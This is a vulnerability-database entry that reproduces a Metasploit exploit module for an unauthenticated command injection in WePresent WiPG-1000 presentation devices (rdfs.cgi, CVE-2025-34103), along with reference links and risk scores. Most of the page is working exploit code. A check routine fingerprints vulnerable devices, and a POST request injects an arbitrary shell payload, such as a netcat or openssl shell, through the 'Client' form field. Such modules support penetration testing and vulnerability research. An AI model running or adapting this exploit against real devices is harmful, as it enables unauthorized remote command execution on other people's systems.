Lucene search
+L

WePresent WiPG-1000 Command Injection

🗓️ 20 Apr 2017 00:00:00Reported by Matthias BrunType 
metasploit
 metasploit
🔗 www.rapid7.com👁 12 Views

Exploiting WePresent WiPG-1000 Command Injection on devices <=2.0.0.7

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2025-34103
29 May 201815:50
circl
cnnvd
CNNVD
Barco WePresent WiPG-1000 安全漏洞
15 Jul 202500:00
cnnvd
cve
CVE
CVE-2025-34103
15 Jul 202513:10
cve
cvelist
Cvelist
CVE-2025-34103 WePresent WiPG-1000 Unauthenticated Command Injection in via rdfs.cgi
15 Jul 202513:10
cvelist
euvd
EUVD
EUVD-2025-21423
3 Oct 202520:07
euvd
nvd
NVD
CVE-2025-34103
15 Jul 202513:15
nvd
ptsecurity
Positive Technologies
PT-2025-29545 · Wepresent · Wepresent Wipg-1000
15 Jul 202500:00
ptsecurity
redhatcve
RedhatCVE
CVE-2025-34103
17 Jul 202513:57
redhatcve
vulnrichment
Vulnrichment
CVE-2025-34103 WePresent WiPG-1000 Unauthenticated Command Injection in via rdfs.cgi
15 Jul 202513:10
vulnrichment
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'WePresent WiPG-1000 Command Injection',
        'Description' => %q{
          This module exploits a command injection vulnerability in an undocumented
          CGI file in several versions of the WePresent WiPG-1000 devices.
          Version 2.0.0.7 was confirmed vulnerable, 2.2.3.0 patched this vulnerability.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Matthias Brun', # Vulnerability Discovery, Metasploit Module
        ],
        'References' => [
          [ 'CVE', '2025-34103' ],
          [ 'URL', 'https://www.redguard.ch/advisories/wepresent-wipg1000.txt' ]
        ],
        'Payload' => {
          'Compat' =>
                  {
                    'PayloadType' => 'cmd',
                    'RequiredCmd' => 'generic netcat openssl'
                  }
        },
        'Platform' => ['unix'],
        'Arch' => ARCH_CMD,
        'Targets' => [
          ['WiPG-1000 <=2.0.0.7', {}]
        ],
        'Privileged' => false,
        'DisclosureDate' => '2017-04-20',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => '/cgi-bin/rdfs.cgi'
    })
    if res && res.body.include?("Follow administrator instructions to enter the complete path")
      Exploit::CheckCode::Appears('The target appears to be vulnerable')
    else
      Exploit::CheckCode::Safe('The target is not vulnerable')
    end
  end

  def exploit
    print_status('Sending request')
    send_request_cgi(
      'method' => 'POST',
      'uri' => '/cgi-bin/rdfs.cgi',
      'vars_post' => {
        'Client' => ";#{payload.encoded};",
        'Download' => 'Download'
      }
    )
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

20 Apr 2017 00:00Current
5.4Medium risk
Vulners AI Score5.4
CVSS 49.3
EPSS0.04232
SSVC
12